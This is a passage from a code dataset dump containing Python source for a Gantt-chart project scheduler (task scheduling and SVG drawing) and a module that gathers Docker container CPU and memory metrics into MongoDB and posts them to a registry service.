dependencies=[], project=None):\n \"\"\"\n Sets the basic attributes of a task\n \"\"\"\n self.name = name\n self.duration = duration\n self.dependencies = dependencies\n self.percent_done = 0\n\n self.resources = []\n for r in resources:\n self.add_resource(r)\n\n self.project = None\n self.set_project(project)\n\n self._start_date = None\n\n def set_project(self, project):\n \"\"\"\n Assigns task to given project. Ensures project has us included in their list.\n \"\"\"\n old_proj = self.project\n self.project = project\n if old_proj != project and self.project is not None:\n self.project.add_task(self)\n\n def add_resource(self, resource):\n \"\"\"\n Assigns task to given project. Ensures project has us included in their list.\n \"\"\"\n if resource not in self.resources:\n self.resources.append(resource)\n resource.add_task(self)\n\n def schedule(self):\n \"\"\"\n Schedule ourselves based on other tasks and resource availability\n\n General algorithm:\n 1. Try first date immediately after dependency\n 1a. If no dependency, use chart start date\n 2. Keep advancing date until first free date\n \"\"\"\n self.clear_schedule()\n\n chart = self.project.chart\n\n # Dependencies\n start_date = chart.start_date\n for task in self.dependencies:\n # Must already be scheduled. While they would automatically schedule when we ask them to,\n # we enforce this to require tasks to be added in date order\n if not task.is_scheduled:\n raise SchedulingError('Task {} is a dependency of {} but has not been scheduled. 
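# --- Hedged illustration (added; not part of the dataset record above). A
# compact restatement of the greedy rule Task.schedule() implements: the
# candidate start is max(chart start, latest dependency end + one day), then
# slide forward a day at a time until every assigned resource is free.
from datetime import date, timedelta

def _greedy_start(chart_start, dep_ends, is_free):
    start = max([chart_start] + [d + timedelta(days=1) for d in dep_ends])
    while not is_free(start):
        start += timedelta(days=1)
    return start

# e.g. one dependency ending Wed Jan 3 2024 and weekends blocked:
assert _greedy_start(date(2024, 1, 1), [date(2024, 1, 3)],
                     lambda d: d.weekday() < 5) == date(2024, 1, 4)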
Please place task prior to {} in project'.format(\n task.name,\n self.name,\n self.name)\n )\n\n if task.end_date > start_date:\n start_date = task.end_date + ONE_DAY\n\n # Resource deconfliction\n date_is_free = False\n while not date_is_free:\n date_is_free = True\n for resc in self.resources:\n if not resc.is_free(start_date):\n start_date += ONE_DAY\n date_is_free = False\n\n self._start_date = start_date\n\n def clear_schedule(self):\n \"\"\"\n Clears any cached scheduling information\n \"\"\"\n self._start_date = None\n\n @property\n def is_scheduled(self):\n \"\"\"\n Returns if this task has had a start date set\n \"\"\"\n return self._start_date is not None\n\n @property\n def start_date(self):\n \"\"\"\n Returns start date of task, calculating if not already cached\n \"\"\"\n if self._start_date is not None:\n return self._start_date\n\n self.schedule()\n return self._start_date\n\n @property\n def end_date(self):\n \"\"\"\n End date of task based on start and duration.\n\n Marks the final day work is actually performed.\n\n If chart is set to not work weekends, schedule will be extended to\n include extra days to compensate for Saturday and Sunday.\n \"\"\"\n work_done = 0\n end_date = self.start_date\n while work_done + 1 < self.duration:\n end_date += ONE_DAY\n\n if end_date.weekday() not in self.project.chart.skipped_days:\n work_done += 1\n\n return end_date\n\n def svg(self, prev_y=0, start=None, end=None, color=None, level=None, offset=0):\n \"\"\"\n Return SVG for drawing this task.\n\n Keyword arguments:\n prev_y -- int, line to start to draw\n start -- datetime.date of first day to draw\n end -- datetime.date of last day to draw\n color -- string of color for drawing the project\n level -- int, indentation level of the project, not used here\n scale -- drawing scale (d: days, w: weeks, m: months, q: quaterly)\n title_align_on_left -- boolean, align task title on left\n offset -- X offset from image border to start of drawing zone\n \"\"\"\n if not self.is_scheduled:\n raise Exception('Unable to draw task until it has been scheduled')\n\n add_modified_begin_mark = False\n add_modified_end_mark = False\n\n add_begin_mark = False\n add_end_mark = False\n\n y = prev_y * 10\n\n if color is None:\n color = self.resources[0].color\n\n def _time_diff(e, s):\n return (e - s).days\n def _time_diff_d(e, s):\n return _time_diff(e, s) + 1\n\n # cas 1 -s--S==E--e-\n if self.start_date >= start and self.end_date <= end:\n x = _time_diff(self.start_date, start) * 10\n d = _time_diff_d(self.end_date, self.start_date) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n # cas 5 -s--e--S==E-\n elif self.start_date > end:\n return (None, 0)\n # cas 6 -S==E-s--e-\n elif self.end_date < start:\n return (None, 0)\n # cas 2 -S==s==E--e-\n elif self.start_date < start and self.end_date <= end:\n x = 0\n d = _time_diff_d(self.end_date, start) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_begin_mark = True\n # cas 3 -s--S==e==E-\n elif self.start_date >= start and self.end_date > end:\n x = _time_diff(self.start_date, start) * 10\n d = _time_diff_d(end, self.start_date) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_end_mark = True\n # cas 4 -S==s==e==E-\n elif self.start_date < start and self.end_date > end:\n x = 0\n d = _time_diff_d(end, start) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_end_mark = True\n add_begin_mark = True\n else:\n return (None, 0)\n\n\n self.drawn_y_coord = y\n\n svg = 
svgwrite.container.Group(id=re.sub(r\"[ ,'\\/()]\", '_', self.name))\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+1)*mm),\n size=((d-2)*mm, 8*mm),\n fill=color,\n stroke=color,\n stroke_width=2,\n opacity=0.85,\n ))\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+6)*mm),\n size=(((d-2))*mm, 3*mm),\n fill=\"#909090\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n\n if add_modified_begin_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1)*mm, (y+1)*mm),\n size=(5*mm, 4*mm),\n fill=\"#0000FF\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n if add_modified_end_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+d-7+1)*mm, (y+1)*mm),\n size=(5*mm, 4*mm),\n fill=\"#0000FF\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n\n if add_begin_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1)*mm, (y+1)*mm),\n size=(5*mm, 8*mm),\n fill=\"#000000\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n if add_end_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+d-7+1)*mm, (y+1)*mm),\n size=(5*mm, 8*mm),\n fill=\"#000000\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n\n if self.percent_done is not None and self.percent_done > 0:\n # Bar shade\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+6)*mm),\n size=(((d-2)*self.percent_done/100)*mm, 3*mm),\n fill=\"#F08000\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n # Title alignment\n tx = x+2\n\n svg.add(svgwrite.text.Text(self.name, insert=((tx)*mm, (y + 5)*mm), fill=FONT_ATTR['fill'], stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15))\n\n if self.resources is not None:\n t = \" / \".join([\"{0}\".format(r.name) for r in self.resources])\n svg.add(svgwrite.text.Text(\"{0}\".format(t), insert=(tx*mm, (y + 8.5)*mm), fill='purple', stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15-5))\n\n return (svg, 1)\n\n def svg_dependencies(self):\n \"\"\"\n Draws svg dependencies between task and project according to coordinates\n cached when drawing tasks\n \"\"\"\n if not self.dependencies:\n return None\n else:\n svg = svgwrite.container.Group()\n for t in self.dependencies:\n if not (t.drawn_x_end_coord is None or t.drawn_y_coord is None or self.drawn_x_begin_coord is None):\n # horizontal line\n svg.add(svgwrite.shapes.Line(\n start=((t.drawn_x_end_coord - 2)*mm, (t.drawn_y_coord + 5)*mm),\n end=((self.drawn_x_begin_coord)*mm, (t.drawn_y_coord + 5)*mm),\n stroke='black',\n stroke_dasharray='5,3',\n ))\n\n marker = svgwrite.container.Marker(insert=(5,5), size=(10,10))\n marker.add(svgwrite.shapes.Circle((5, 5), r=5, fill='#000000', opacity=0.5, stroke_width=0))\n svg.add(marker)\n # vertical line\n eline = svgwrite.shapes.Line(\n start=((self.drawn_x_begin_coord)*mm, (t.drawn_y_coord + 5)*mm),\n end=((self.drawn_x_begin_coord)*mm, (self.drawn_y_coord + 5)*mm),\n stroke='black',\n stroke_dasharray='5,3',\n )\n eline['marker-end'] = marker.get_funciri()\n svg.add(eline)\n\n return svg\n\n def __str__(self):\n \"\"\"\n All dates and resources for task\n \"\"\"\n return '\\tTask {} ({} resources, {} dependencies): {} days, {} through {}'.format(\n self.name,\n len(self.resources),\n len(self.dependencies),\n self.duration,\n self.start_date,\n self.end_date,\n )\n\n\nclass SchedulingError(Exception):\n \"\"\"\n Exceptions related to improperly configured or impossible scheduling\n \"\"\"\n pass\n\n\nclass 
_my_svgwrite_drawing_wrapper(svgwrite.Drawing):\n \"\"\"\n Hack for beeing able to use a file descriptor as filename\n \"\"\"\n def save(self, width='100%', height='100%'):\n \"\"\" Write the XML string to **filename**. \"\"\"\n test = False\n import io\n\n # Fix height and width\n self['height'] = height\n self['width'] = width\n\n test = type(self.filename) == io.TextIOWrapper\n\n if test:\n self.write(self.filename)\n else:\n fileobj = io.open(str(self.filename), mode='w', encoding='utf-8')\n self.write(fileobj)\n fileobj.close()\n","repo_name":"traherom/simple-scheduler","sub_path":"projectscheduler/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":27556,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"4608742889","text":"import pytz\nimport logging\nimport os\nfrom app import app\nfrom datetime import datetime\nimport mongodb_wrapper\nfrom runtime import runtime\nimport metric_handler\nimport threading\nfrom timeloop import Timeloop\nfrom datetime import timedelta\nfrom lib.API_Wrapper import DEHAPIWrapper\nfrom multiprocessing.pool import ThreadPool\nimport re\nimport pymongo\nimport traceback\nimport sys\n\ntl = Timeloop()\ncontainer_name = None\nlogger = logging.getLogger(\"./MetricsUpdater.log\")\n# LOGLEVEL = app.config[\"LOGLEVEL\"]\n# logging.basicConfig(level=LOGLEVEL)\n\nif app.config['secure_connection'].lower().strip() == \"true\":\n # print(\"DEH Client - Attempting to establish communication with Docker Host over secured channel.\")\n logger.info(\"DEH Client - Attempting to establish communication with Docker Host over secured channel.\")\n CERT_BASE = app.config[\"tls_cert_path\"]\n docker_ca_cert = CERT_BASE + \"/ca.pem\"\n docker_client_cert = CERT_BASE + \"/cert.pem\"\n docker_client_key = CERT_BASE + \"/key.pem\"\n paths = [docker_ca_cert, docker_client_cert, docker_client_key]\n https_url = app.config[\"docker_host\"]\n for path in paths:\n if os.path.exists(path):\n pass\n else:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish secured communication, \"\n \"found missing cert. file {}. Ensure all necessary cert., \"\n \"files are copied starting DEH Client.\".format(path))\n\n try:\n measure_usage_client = metric_handler.MetricHandler(docker_ca_cert,\n docker_client_cert,\n docker_client_key, https_url, container_name)\n except Exception as Error:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish secured communication, \"\n \"failed to create metric handler client with ERROR {}. \".format(Error))\n\nelif app.config['secure_connection'].lower().strip() == \"false\":\n # print(\"Warning DEH Client - Attempting to establish open communication with Docker Host i.e. unsecured. \")\n logger.info(\"Warning DEH Client - Attempting to establish open communication with Docker Host i.e. unsecured. \")\n docker_ca_cert = None\n docker_client_cert = None\n docker_client_key = None\n https_url = app.config[\"docker_host\"]\n http_url = re.sub(\"^https://\", \"http://\", https_url)\n try:\n measure_usage_client = metric_handler.MetricHandler(docker_ca_cert,\n docker_client_cert,\n docker_client_key, http_url, container_name)\n\n except Exception as Error:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish unsecured communication, \"\n \"failed to create metric handler client with ERROR {}. 
\".format(Error))\n\n\nclass MetricsUpdater:\n __logger = logging.getLogger(\"DEHClientEnabler.metric_updater\")\n # loglevel = app.config[\"LOGLEVEL\"]\n # logging.basicConfig(level=loglevel)\n MAX_THREAD_POOL_SIZE = 500000\n last_metrics_posted = datetime.now()\n def __init__(self):\n \"\"\"Initializes the logger and the docker client connection.\n \"\"\"\n # self.CERT_BASE = app.config[\"tls_cert_path\"]\n # self.docker_ca_cert = self.CERT_BASE + \"/ca.pem\"\n # self.docker_client_cert = self.CERT_BASE + \"/cert.pem\"\n # self.docker_client_key = self.CERT_BASE + \"/key.pem\"\n # self.https_url = app.config[\"docker_host\"]\n # self.container_name = None\n # self.DOCKER_CLIENT_TIMEOUT = 3\n # self.keep_measuring = True\n\n self.__logger = logging.getLogger(\"./MetricsUpdater.log\")\n # self.loglevel = app.config[\"LOGLEVEL\"]\n # logging.basicConfig(level=self.loglevel)\n try:\n self.mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n port=app.config[\"mongo_port\"],\n database=app.config[\"mongo_db\"],\n collection=app.config[\"mongo_collection_metrics\"])\n if self.mongo_client:\n self.__logger.info(\"Successfully established connection with internal mongodb\")\n\n except Exception as Error:\n self.__logger.error(\"Failed to establish communication with the mongoDB with ERROR: {},\"\n \"Please check DB connection string in .env & docker-compose file, \"\n \"if started as Docker Container. Else check in app.py if run from code directly. \" \n \"\".format(Error))\n # Internal config\n self.metrics_capture_time_interval = runtime.config[\"unit_of_measure\"]\n self.metrics_sorting_by = runtime.config[\"sort_by\"]\n self.metrics_no_of_records = runtime.config[\"no_of_records_per_timestamp\"]\n\n # self.measure_usage_client = metric_handler.MetricHandler(self.docker_ca_cert, self.docker_client_cert,\n # self.docker_client_key,\n # self.https_url,\n # self.container_name)\n\n # thread pool\n\n def thread_start(self):\n self.__thread = threading.Thread(target=self.run, args=())\n self.__thread.daemon = True\n self.__thread.start()\n self.__thread.join()\n\n def manage_write_metrics_to_db(self, individual_metric):\n \"\"\"\n Format the metrics generated by metrics_handler to the desired DataModel recommended by RRM & publish the data\n Implemented : Updates the DB\n Future : POST to RRM Consumer API\n \"\"\"\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n # utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%d %H:%M:%S %Z%z\")\n utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n resource_id = None\n try:\n for i in individual_metric:\n resource_id = individual_metric[i][\"info\"][\"container_id\"]\n MetricsUpdater.__logger.info(\"Attempting to write metrics to local DB for container id : {}\"\n .format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} generated is : {}\"\n .format(resource_id, individual_metric))\n current_cpu_percent = individual_metric[i][\"Volume\"][\"cpu\"][\"cpu_percent\"]\n current_mem_percent = individual_metric[i][\"Volume\"][\"mem\"][\"mem_percent\"]\n uptime = individual_metric[i][\"Uptime\"]\n hostname = individual_metric[i][\"HostName\"]\n ip = individual_metric[i][\"IP\"]\n bse_id = individual_metric[i][\"BSE_ID\"]\n uid = individual_metric[i][\"RRM_ID\"]\n image = individual_metric[i][\"Image\"]\n updated_cpu_present = {\"time_stamp\": utc_current_datetime_str,\n \"cpu_percent\": current_cpu_percent}\n updated_mem_present = {\"time_stamp\": 
utc_current_datetime_str,\n \"mem_percent\": current_mem_percent}\n # Read DB if the resource data is already persisted. If exists update record\n MetricsUpdater.__logger.info(\"Checking if record for container id : {} ,is already persisted to DB. \"\n \"If so update existing record, else insert a new record. \"\n .format(resource_id))\n documents = self.mongo_client.read({\"_id\": resource_id})\n if documents:\n formatted_data = {}\n MetricsUpdater.__logger.info(\"Record for container id : {} ,is already persisted to DB. \"\n \"So updating existing record in DB with current metrics data. \"\n .format(resource_id))\n for document in documents:\n utc_lastupdated_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_lastupdated_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n cpu_percent = self.metrics_sorting_by[\"cpu\"]\n mem_percent = self.metrics_sorting_by[\"memory\"]\n cpu_update = self.mongo_client.update_array(resource_id, \"cpu_percent\", updated_cpu_present,\n cpu_percent,\n retain_no_of_records=self.metrics_no_of_records)\n mem_update = self.mongo_client.update_array(resource_id, \"mem_percent\", updated_mem_present,\n mem_percent,\n retain_no_of_records=self.metrics_no_of_records)\n if cpu_update and mem_update:\n MetricsUpdater.__logger.info(\"Metrics data updated for for container id : {} \"\n \"updated successfully to local DB.\".format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Failed to update Metrics data for container id : {}, \"\n \" possibly cpu & mem attributes missing from \"\n \"metrics generated.\"\n .format(resource_id))\n\n # If rrm_id & bse_id generated after record persisted in mongodb, update the same.\n mongo_bse_id = document[\"BSE_ID\"]\n mongo_uid = document[\"RRM_ID\"]\n if mongo_uid is None:\n uid = individual_metric[i][\"RRM_ID\"]\n if mongo_bse_id is None:\n bse_id = individual_metric[i][\"BSE_ID\"]\n\n updated_metadata = {}\n try:\n updated_metadata = {\"uptime\": uptime,\n \"lastupdated\": utc_lastupdated_datetime_str,\n \"RRM_ID\": uid,\n \"BSE_ID\": bse_id\n }\n MetricsUpdater.__logger.info(\"Record for container id : {} already persisted to DB. \"\n \"Attempting to updated metadata: {}. \"\n .format(resource_id, updated_metadata))\n output = self.mongo_client.update_one(resource_id, updated_metadata)\n\n if 'Status' in output:\n if output['Status'] == 'Successfully Updated':\n MetricsUpdater.__logger.info(\"Record for container id : {} \"\n \"already persisted to DB. \"\n \"Successfully updated metadata: {}.\"\n .format(resource_id, updated_metadata))\n elif output['Status'] == \"Nothing was updated\":\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already or \"\n \"failed to update existing record. \"\n \"Skipping write/ update with error: {}. 
\"\n .format(resource_id, error))\n\n # If new resource create a new record/ document\n else:\n \"\"\"\n # GET BSE registration info\n # TODO handle multiple BSE registrations with same name\n # & attempt to update IDs only if previous iterations failed to get info\n host = app.config[\"DEH_BSE_Proxy_URL\"]\n method = app.config[\"DEH_BSE_GET_SERVICE\"]\n # Note : The service name is case sensitive\n deh_bse_obj = DEHAPIWrapper(host, method,\n payload={\"service_name\": resource_name})\n status_code, response = deh_bse_obj.deh_bse_get_running_services()\n if status_code == 200 and response.json() != {}:\n for bse_response_dict in response.json():\n bse_id = response.json()[bse_response_dict][\"ID\"]\n # Exit in case of multiple registration with same name\n break\n else:\n bse_id = None\n # GET RRM registration info\n method = app.config[\"DEHEnablerHub_Search_Resource\"]\n deh_enabler_hub_obj = DEHAPIWrapper()\n parameters = {\"name\": resource_name}\n status_code, response = deh_enabler_hub_obj.deh_enabler_hub_resource_search(payload=parameters,\n method=method)\n if status_code == 200:\n contents = response.json()[\"content\"]\n if len(contents) > 0:\n for content in contents:\n rrm_id = content[\"uid\"]\n \"\"\"\n # Writing to DB\n MetricsUpdater.__logger.info(\"No record for container id : {} in DB. \"\n \"So attempting to insert new record with metrics data. \"\n .format(resource_id))\n formatted_data = {\"_id\": resource_id,\n \"uptime\": uptime,\n \"hostname\": hostname,\n \"ip\": ip,\n \"image\": image,\n \"BSE_ID\": bse_id,\n \"RRM_ID\": uid,\n \"first_inserted\": utc_current_datetime_str,\n \"lastupdated\": utc_current_datetime_str,\n \"cpu_percent\": [updated_cpu_present],\n \"mem_percent\": [updated_mem_present]}\n\n\n # TODO: Retain Historic Data in DB\n if runtime.config['db_keep_non_uid_records'] == \"False\" or \\\n runtime.config['db_keep_non_uid_records'] == False:\n if formatted_data['RRM_ID'] is not None:\n write = self.mongo_client.write(formatted_data)\n if write:\n MetricsUpdater.__logger.info(\"Metrics data for container id : {} \"\n \"inserted successfully to local DB.\".format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} \"\n \"inserted .\".format(formatted_data))\n else:\n MetricsUpdater.__logger.warning(\"Failed to write Metrics data for container id : {} \"\n \"to local DB.\".format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} \"\n \"which was attempted to insert was : {} .\"\n .format(resource_id, formatted_data))\n else:\n MetricsUpdater.__logger.warning(\"Skip writing metrics data to DB since the \"\n \"container id : {} of DEH Resource : {} , \"\n \"is not associated with uid. \"\n \"Please associate an valid UID to track metrics. 
\"\n .format(formatted_data['_id'],\n formatted_data['image']))\n elif runtime.config['db_keep_non_uid_records'] == \"True\" or \\\n runtime.config['db_keep_non_uid_records'] == True:\n write = self.mongo_client.write(formatted_data)\n\n if write:\n MetricsUpdater.__logger.info(\"Metrics data for container id : {} \"\n \"inserted successfully to local DB.\".format(resource_id))\n else:\n MetricsUpdater.__logger.error(\"Failed to write metrics data to DB for the \"\n \"container id : {} & data attempted to write : {} .\"\n .format(formatted_data['_id'], formatted_data))\n\n except KeyError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered, while monitoring container id {} possible causes:\"\n \"Cause 1: Container under monitoring stopped while metrics generation \"\n \"was in progress. or . \"\n \"Cause 2: Metrics not generated properly ie certain fields not captured. \"\n \"Please check and start/ restart containers\".format(resource_id))\n MetricsUpdater.__logger.warning(\"Exception encountered : KeyError & Possibly missing keyword. \"\n \"details : {}. \".format(error))\n\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Exception encounter while monitoring container {}. \".format(resource_id))\n MetricsUpdater.__logger.warning(\"Exception details : {}. \".format(error))\n\n @tl.job(interval=timedelta(seconds=runtime.config['unit_of_measure']))\n def measure_usage(resource_status=\"Running\"):\n max_usage = 0\n metrics = []\n try:\n time_interval = runtime.config['unit_of_measure']\n MetricsUpdater.__logger.info(\"Attempting to generate metrics periodically i.e. at an interval of : {} \"\n \"seconds, metrics data will be captured for all containers with status : {} \"\n \"and are associated with a valid UID. \"\n .format(time_interval, resource_status))\n metrics = measure_usage_client.get_metrics_by_status_only_with_uid({\"status\": resource_status})\n if metrics:\n for individual_metric in metrics:\n try:\n MetricsUpdater.__logger.info(\"Metrics data generated i.e. found containers matching status {} \"\n \", proceeding to write to DB. \".format(resource_status))\n # This loop is for accessing the values of dict individual_metric\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%d %H:%M:%S %Z%z\")\n metrics_updater = MetricsUpdater()\n metrics_updater.manage_write_metrics_to_db(individual_metric)\n # except KeyError as error:\n # MetricsUpdater.__logger.error(\n # \"Exception encountered while writing data to local DB for docker container : \"\n # \"{} \".format(individual_metric))\n # MetricsUpdater.__logger.error(\"Exception encountered : KeyError & Possibly missing keyword. \"\n # \"details : {}. \".format(error))\n #\n # except Exception as error:\n # MetricsUpdater.__logger.error(\n # \"Exception encountered while writing metrics data to local DB for docker container : \"\n # \"{}. \".format(individual_metric))\n # MetricsUpdater.__logger.error(\"Exception details : {}. \".format(error))\n except KeyError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"KeyError & Possibly missing keyword. details : {}. \"\n .format(error))\n continue\n except AttributeError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"details : {}. 
\".format(error))\n continue\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"details : {}. \".format(error))\n continue\n else:\n MetricsUpdater.__logger.warning(\"No Docker Container/s is/are running on the configured Docker Host \"\n \"for monitoring. \"\n \"To generate and start tracking metrics, \"\n \"Please start some Container instance of DEH resources, with \"\n \"valid RRM registration(UID) associated with the same. \")\n\n except Exception as error:\n # MetricsUpdater.__logger.warning(\"Exception encountered while capturing metrics / writing to db.\"\n # .format(error))\n if len(metrics) == 0:\n MetricsUpdater.__logger.warning(\"No Docker Container/s is/are running on the configured Docker Host \"\n \"for monitoring. \"\n \"To generate and start tracking metrics, \"\n \"Please start some Container instance of DEH resources, with \"\n \"valid RRM registration(UID) associated with the same. \")\n else:\n MetricsUpdater.__logger.warning(\"Exception encountered while capturing metrics / writing to db.\"\n .format(error))\n\n @tl.job(interval=timedelta(seconds=runtime.config['timestamp']))\n def post_metrics_rrm_thread(resource_status=\"Running\"):\n ## Read data from metrics db\n post_metrics = None\n mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n port=app.config[\"mongo_port\"],\n database=app.config[\"mongo_db\"],\n collection=app.config[\"mongo_collection_metrics\"])\n documents = mongo_client.find_projection({},\n {\"cpu_percent\":\n {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]},\n \"mem_percent\":\n {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]}}\n )\n records = []\n for document in documents:\n records.append([document])\n deh_enabler_hub_obj = DEHAPIWrapper()\n\n if len(records) >= 1:\n MetricsUpdater.__logger.info(\"Post metrics to RRM, Found metrics records in local db to be posted to RRM, \"\n \"Now attempt to POST. \")\n try:\n # with ThreadPool() as pool:\n # post_metrics = pool.map(deh_enabler_hub_obj.initiate_post_deh_metrics_request, records)\n # MetricsUpdater.last_metrics_posted = datetime.now()\n # MetricsUpdater.__logger.info(\"Post metrics to RRM, Last successful metrics post to RRM : {}. \"\n # .format(MetricsUpdater.last_metrics_posted))\n # return post_metrics\n for record in records:\n MetricsUpdater.__logger.debug(\"Post metrics to RRM, attempting to post metrics for record: {}.\"\n .format(record))\n post_metrics = deh_enabler_hub_obj.initiate_post_deh_metrics_request(record)\n return post_metrics\n except Exception as E:\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"exception: {}. \".format(E))\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"trace: {}. \".format(traceback.format_exc()))\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"trace: {}. \".format(sys.exc_info()[2]))\n return None\n\n else:\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, No metrics found in local db to be posted to RRM. \"\n \"Please check, \"\n \"1) If any DEH containers are running on the configured \"\n \"Docker Host.\"\n \"2) If any Containers are running, \"\n \"ensure the same is associated with valid UID. 
\"\n \"Please refer installation instructions document on how to do so. \"\n \"3) Ensure local mongodb containers is up and running. \")\n pass\n\n # @tl.job(interval=timedelta(seconds=runtime.config['retry_timestamp']))\n # def retry_post_metrics_to_rrm(resource_status=\"Running\"):\n # last_successful_metrics_post = MetricsUpdater.last_metrics_posted\n # current_time_stamp = datetime.now()\n # time_difference = (current_time_stamp - last_successful_metrics_post).total_seconds()\n # if time_difference >= runtime.config['retry_timestamp']:\n # MetricsUpdater.__logger.info(\"Retry post metrics to RRM, \"\n # \"Found metrics records in local db to be posted to RRM, \"\n # \"Now attempt to retry POST. \")\n # mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n # port=app.config[\"mongo_port\"],\n # database=app.config[\"mongo_db\"],\n # collection=app.config[\"mongo_collection_metrics\"])\n # documents = mongo_client.find_projection({},\n # {\"cpu_percent\":\n # {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]},\n # \"mem_percent\":\n # {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]}}\n # )\n # records = []\n # for document in documents:\n # records.append([document])\n #\n # if len(records) >= 1:\n # MetricsUpdater.__logger.info(\"Retry post metrics to RRM, \"\n # \"Found metrics records in local db to be posted to RRM, \"\n # \"Now attempt to POST to RRM. \")\n # deh_enabler_hub_obj = DEHAPIWrapper()\n #\n # try:\n # with ThreadPool(min(MetricsUpdater.MAX_THREAD_POOL_SIZE, len(records))) as pool:\n # post_metrics = pool.map(deh_enabler_hub_obj.initiate_post_deh_metrics_request, records)\n # return post_metrics\n #\n # except Exception as E:\n # MetricsUpdater.__logger.warning(\"Retry post metrics to RRM, \"\n # \"Exception encountered While Retry Post Metrics Thread, with \"\n # \"exception: {}. \".format(E))\n # return None\n # else:\n # MetricsUpdater.__logger.warning(\"Retry post metrics to RRM, No metrics found in local db to be \"\n # \"posted to RRM. Please check, \"\n # \"1) If any DEH containers are running on the configured \"\n # \"Docker Host.\"\n # \"2) If any Containers are running, \"\n # \"ensure the same is associated with valid UID. \"\n # \"Please refer installation instructions document on how to do so. \"\n # \"3) Ensure local mongodb containers is up and running. \")\n # pass\n\n @tl.job(interval=timedelta(seconds=runtime.config['delete_record_service_interval']))\n def purge_older_internal_db_records(resource_status=\"Running\"):\n \"\"\" Module to delete metrics records in local DB which are not posted to RRM\"\"\"\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_timedelta_datetime = utc_current_datetime - timedelta(seconds=runtime.config['delete_record'])\n utc_current_datetime_str = utc_timedelta_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n deh_enabler_hub_obj = DEHAPIWrapper()\n query = {\"first_inserted\": {\"$lt\": utc_current_datetime_str}}\n MetricsUpdater.__logger.info(\"Attempting to delete older internal db records .i.e. 
